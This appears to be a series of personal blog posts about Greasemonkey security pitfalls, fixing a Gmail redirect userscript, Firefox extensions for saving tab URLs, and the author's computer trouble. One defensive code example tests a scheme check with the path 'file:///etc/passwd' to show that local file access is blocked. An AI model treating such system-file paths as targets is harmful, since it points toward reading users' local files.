One might think that an article written years ago may be outdated, and in some ways, Pilgrim’s article does not seem to be as accurate as it once was. In fact, I recently came across a set of notes by Brian Donovan titled “Greasemonkey Pitfalls 2007” in which it is said that some of the pitfalls mentioned in Pilgrim’s article are not actually valid pitfalls. Donovan’s notes link to pages with information on each pitfall, and these pages link to Greasemonkey scripts that are designed to work with those pages. Each of those scripts contains JavaScript code that Pilgrim’s article said would not work in the context of a Greasemonkey script. However, after running these scripts on the pages of Donovan’s site, one will see that some of these pitfalls indeed no longer appear to be valid. Other pitfalls, however, do still appear to be valid, and it is important for Greasemonkey coders to keep this fact in mind. Pilgrim’s article might not be as accurate as it previously was. Still, it can be considered a good starting point for Greasemonkey coders looking for information on which ways of writing the JavaScript in Greasemonkey scripts will not work, and it also serves as a guide that explains why these restrictions exist.

Indeed, this article was published quite a while ago, and thus there has been much time for many to read it. Therefore, many of those reading this post may have already read the article I am summarizing. However, if this summary leads to greater knowledge among Greasemonkey coders of what was written there, and if it leads to more of them reading the article, it will have been worth writing. I think it is quite important that as many Greasemonkey coders as possible read what Pilgrim wrote, and I do not consider the material as confusing as Pilgrim says it is. It can be good to know about the security issues that Greasemonkey has had before, although what may be considered the main reason the article is important is its listing of common pitfalls that result from the solutions to those past security issues. Still, security issues from the past should be considered relevant, and one reason these past issues matter ties in with the more recent security issues Greasemonkey has had.

These most recent security issues that Greasemonkey has had reminded me of what was said in Pilgrim’s article. These issues involve the unsafeWindow and unsafeDocument objects and Greasemonkey’s API functions, all of which are mentioned in the article. A number of scripts that use these objects and API functions are affected by this software update and will not work with the new version. Previously, to address the much more serious security-related issues Greasemonkey had in version 0.3, many more scripts did not work until later versions were released. Greasemonkey’s most recent security issues may be considered much less serious than the security-related issues it had before, but they should still be mentioned. The way in which Greasemonkey scripts are to be written is affected once again. And although it is affected to a much lesser extent than before, there are now more of these pitfalls of which Greasemonkey coders must be aware.

This newest version of Greasemonkey, version 0.7.20080121.0, is being mentioned here on this blog weeks after it was actually released. One might think I should have made it a priority to write about this new version sooner. However, I consider this entry, which is mostly a summary of an important article, the most important entry that I have written to this blog so far. Therefore, I took much time to try to ensure that this summary was as well-written as possible. In fact, Pilgrim’s article can itself be considered something of a summary, as it does not list all the security fixes that were made to Greasemonkey. For example, scripts are no longer allowed to access URLs starting with “file://”, which prevents scripts from accessing local files, and that is not mentioned in Pilgrim’s article. This entry may therefore be considered a summary of a summary, and Pilgrim’s article only a starting point when reading about security issues. I would also suggest referring to the information on security on the Greasespot wiki when one has questions about Greasemonkey security. The security issues addressed by the newest version of Greasemonkey will be covered in the next entry in this series on Greasemonkey and security, and that entry will hopefully be published before this new version becomes too outdated to write about.
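
The general idea behind such a restriction can be sketched as a simple scheme check. This is only a hypothetical illustration, not Greasemonkey’s actual implementation:

```javascript
// A hypothetical sketch of the kind of scheme check that blocks
// requests to local files (this is not Greasemonkey's actual
// implementation).
function isAllowedUrl(url) {
  // Only http: and https: schemes are permitted; file: URLs, which
  // point at files on the user's hard drive, are rejected.
  return /^https?:/.test(url);
}

console.log(isAllowedUrl("https://example.com/")); // true
console.log(isAllowedUrl("file:///etc/passwd")); // false
```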

An Update to a Script That I May Not Be Trusted to Update

It was not long ago that I discovered that a number of Greasemonkey scripts that are designed to work with Gmail needed to be updated to work properly again after a few changes were made to Gmail’s code. Once I was again able to access a web browser with Greasemonkey installed, I checked to see whether the script that I wrote for redirecting to the older version of Gmail upon logging into Gmail was affected. After running a few tests, I saw that the script performed the redirect successfully when accessing Gmail through a secure connection, but not when “http://” rather than “https://” was entered as the first part of the URL. This error was not reported on the page for the script on Userscripts.org, perhaps because secure connections to Gmail are used more often by the users of this script. In any case, I took the time to modify the script, test it, and ensure that it would redirect the user regardless of whether the URL indicated a secure or non-secure connection.
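
I will not reproduce the script’s exact code here, but the general idea behind the fix can be sketched as follows. The function names are my own, and the “?ui=1” parameter is simply an assumed way of requesting the older Gmail interface:

```javascript
// Illustrative sketch of protocol-agnostic URL matching; the function
// names are hypothetical, and "?ui=1" is an assumed parameter for
// requesting the older Gmail interface.
function isGmailUrl(url) {
  // "https?" matches both "http://" and "https://". A pattern tied to
  // only one scheme misses the other, which is the kind of
  // one-character difference that can break a redirect.
  return /^https?:\/\/mail\.google\.com\//.test(url);
}

function redirectTarget(url) {
  return isGmailUrl(url) ? url + "?ui=1" : url;
}

console.log(redirectTarget("http://mail.google.com/mail/"));
console.log(redirectTarget("https://mail.google.com/mail/"));
```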

After I removed only one ASCII character from the script’s source code, it worked as intended once again. Although I only needed to remove one byte of data from the script’s code, I did consider it an accomplishment to correct that error when I did. And the main reason I am surprised that I was able to get this done without the error being reported on the script’s web page is not that I am still unable to work with my own personal computer. That reason is the main point of this post. (I am not dedicating an entire blog post to the removal of eight bits of data from a script.) And this main point involves some more important information that I need to give about this script.

Although this script is one that has been downloaded and installed more often than any other Greasemonkey script I have written so far, as you can see here, it is actually not one that I myself often use. When I wrote this script, it was written not so much for myself as for those who preferred the older version of Gmail to the newer one. From the time that I first wrote it, the script was designed as a quick fix to solve what many others viewed as a problem. I personally do not mind the newer version of Gmail, and thus I would not be expected to use this script very often. Therefore, if it needs to be updated, it is not likely that I would be one of the first to know about the need for an update.

I suppose that one could be amused by the irony of how what appears to be my most widely installed script is one that I personally do not often use. However, with many people apparently using it, it fortunately appears to be the one with the largest user base to report errors and suggest solutions to them. I would say that I had done well in updating it, considering that I received no notifications of the script not working and that I have recently been unable to work with a browser with Greasemonkey installed. I have written this script for the users who want it, and I will try to maintain it for the same reason.

Problems with Tabbed Web Browsing (And How I Wish I Could Experience Them Now)

As I continue to do what work I can on this blog without the ability to use my own personal computer, I continue to look for work to do once I am able to use my computer again. I have spent the more limited time in which I have been able to access the web looking for ideas on what to write about and on what my next software project should be. In fact, I have spent so much time focusing on the content of my blog posts and on the software that I work on that I have made general maintenance of this blog a lower priority than it should have been. And after making a few overdue updates to the sidebar of this blog, I now write about a topic that I have thought about before, although not as much as I have recently: the issues associated with tabbed web browsing. It was after viewing this entry on Lifehacker that I was reminded why I ever gave thought to this topic. It describes a common problem that tends to occur when many browser tabs are open, and one interesting approach to solving it, which led me to consider other possible approaches.

When I look back on the first time that I was able to use separate tabs within a web browser, I, like many others who had discovered tabbed browsing for the first time, thought tabbed browsing was a great idea. It changed the way in which many users browsed the web. Previously, I never would have thought that there would be a time that I would have literally dozens of web pages open at a time. However, I have found that there are not many times that I have fewer than a dozen browser tabs open in my browser at once. And having so many web pages open is something that never would have happened if I needed to open these web pages in separate browser windows.

However, as is often the case with useful innovations, issues arise with them. One such issue occurs when, as is often the case, many tabs are open at once. What I often find is that I would like the ability to later recover what was in each browser tab at a particular time. Sometimes I would like to ensure that I am able to continue from where I left off in case my browser or PC crashes. I also tend to open links in new tabs with the intention of reading them at a later time. To solve this problem, which apparently many others also have, what I personally have done is bookmark all open tabs and store them in a separate folder whenever I want to save what I have open at a particular time. However, this leads to clutter in my list of bookmarks. And what if I simply want to know which URLs I had open, without bringing them up again in browser tabs or looking in places such as the bookmarks.html file in my Firefox profile folder? What can be done about this? Well, when using Mozilla Firefox, this is something that can be addressed, as one would expect with Firefox, through Firefox extensions.

As was noted in the previously mentioned Lifehacker article, the extension titled Copy All Urls is useful for times when one needs to save a copy of the URLs one has open at a particular time. With this extension installed, one can copy the URL in each open tab to the clipboard, so that these URLs can be pasted anywhere one would want to paste them. Another feature that can be quite useful is the option to include the page title with each URL. This feature is good to have because URLs do not always give informative descriptions of the content at the URL, whereas page titles often do. The extension has other useful features as well, such as the option to have the URLs copied in HTML form. However, the inclusion of features such as these can lead to ideas about other features that could be added, and in turn, to extensions that implement those features. And perhaps not surprisingly, ideas on additional features that could be included, and information about extensions that perform related tasks, were mentioned in the comments section of the Lifehacker article.
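
The kind of output these options produce can be sketched in plain JavaScript. The tab data here is hypothetical, as a real extension would read the titles and URLs from the browser’s open tabs:

```javascript
// An illustrative sketch of the plain-text and HTML output such an
// extension might produce; the tab data is hypothetical, as a real
// extension would read it from the browser's open tabs.
const openTabs = [
  { title: "Example Page", url: "http://example.com/" },
  { title: "Another Page", url: "http://example.org/" },
];

// Plain-text form: one "title - URL" pair per line, so page titles
// describe URLs that are not self-explanatory.
function formatAsText(tabs) {
  return tabs.map((tab) => tab.title + " - " + tab.url).join("\n");
}

// HTML form: one anchor per tab, ready to paste into a web page.
function formatAsHtml(tabs) {
  return tabs
    .map((tab) => '<a href="' + tab.url + '">' + tab.title + "</a>")
    .join("<br>\n");
}

console.log(formatAsText(openTabs));
console.log(formatAsHtml(openTabs));
```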

It does not come as a surprise that extensions similar to Copy All Urls are already publicly available. One that performs a similar task and was mentioned in the comments section of the Lifehacker article is the extension known as Tab URL Copier. This extension gives the option to copy the URLs in all tabs (or only the URL in the currently selected tab) to the clipboard after right-clicking the web page in the currently selected tab. There is also the Send Tab URLs extension, which specializes in e-mailing these URLs. And then there is the Session Manager extension, which takes the concept of restoring browser sessions a few steps further. In addition to giving the user the ability to reopen the tabs that were open at a given time, it tries to restore them to the state they were in when they were closed. For example, it can restore data that was entered into forms on web pages that were open, which is something else that many users would want restored after the browser closes unexpectedly.

Indeed, many have considered issues related to tabbed browsing and have approached these issues in a number of ways. And as I previously mentioned, the topic of tabbed browsing issues has been one that I have thought about. In fact, I have thought about it enough to consider writing a Firefox extension that performs tasks related to saving and restoring the information in browser tabs. I have discovered that some have already implemented ideas similar to the one I had. However, I am sure that other users would like something from their imagination implemented. One example of such an idea is the integration of bookmarking open tabs with saving URLs to social bookmarking sites such as Del.icio.us, which was a suggestion made in the comments section of the Lifehacker article.

I am not sure if working on issues related to tabbed browsing will be my next major project. However, it is a topic that I find too interesting to not consider at least at some point. I have gained a new appreciation for tabbed browsing not only because of these articles on the web that I have read. It is also because the PCs at the library from which I have had to blog do not have any browsers installed on them that have tabbed browsing as a feature. I certainly would prefer to deal with the issues that come with tabbed browsing than the problem of the lack of existence of browser tabs.

Making the Best of an Unfortunate Situation

I am presently facing the kind of difficulty that I am sure many other bloggers have encountered. And it is not writer’s block, or anything else that tends to be addressed by those who give tips about blogging. The difficulty that I am presently having is that the computer that I primarily use needs to be serviced, and I do not own another computer.

During this time that I have needed to access the web from other places, it has been a challenge for me to keep this blog updated. In addition to the most obvious difficulty of being unable to log into my account as often, there are other difficulties that I am having. I am unable to work on any of the software projects that I have been working on, and I am unable to spend as much time looking online for anything to write about. I knew that I was quite dependent on my personal computer, and I did not think that I needed this reminder of exactly how dependent upon it I have been.

However, it has been during this time that I have found that I may have relied on my PC more than I should have. With my PC unavailable to me at this time, I have considered this a time to read a few books that I have been trying to find the time to read. It was in my last post that I said that people tend to read from paper differently from how they read what is on a screen. And so it is during this time that I have been able to take time to learn about concepts that I have been trying to learn about in what may be a more thorough fashion. Finding other ways to occupy my time has given me an opportunity to find different ways of approaching problems other than approaching them through the use of a computer.

I can think of this as a break that I am taking from the routine of looking online for information and from the work I do in writing software code. Time away from the computer can be valuable and I am getting a reminder of how valuable that time can be. I certainly do need to have access to my PC and the web for what I do. I have been looking to take the time to give Firefox 3 Beta 2 a test drive, and I am considering getting those Greasemonkey scripts that I have been working on released as soon as possible. I have not been sure what exactly should be considered a higher priority among what it is that I have planned on doing. However, time away from what I have done has helped me find out what is most important. And that is one of a few reasons that having to take this break from my usual routines could be quite beneficial for me in the long run.

Improving on How I Write

It seems to me that articles on how one can improve one’s blog have been appearing more often on sites such as Digg. And it also seems that there are more books available for those looking to improve their blogs. Or perhaps it is that I have been paying more attention to what is being said about blogging. And perhaps a reason I have been paying more attention to anything blogging-related is that I think some advice would be useful, despite what I have said before about articles and books about blogging. I would say that if there is something that I can improve on here, it would be how I write what I write. My way of writing has, perhaps understandably, been criticized. And so as I continue to spend much time ensuring that what I write here is well-written, I look to see what I can do to improve it.

It might be best for me to look for advice specific to blogs, as opposed to advice on how one can improve one’s writing in general. I have found that people tend to read what is on a screen somewhat differently from how they read from a sheet of paper. This is something that perhaps I should have known and considered, and I may need to know what I can do differently to make what I write more appropriate for a blog. And so this has made me consider buying a book on this topic, despite the fact that these books often contain information that I may not find useful.

I have thought that I will look back on the first posts to my blog and consider them ones that were written before I became very good at blogging. I have expected to improve over time. However, I may not be able to do that without some advice, whether this advice can be found online or in a more old-fashioned way.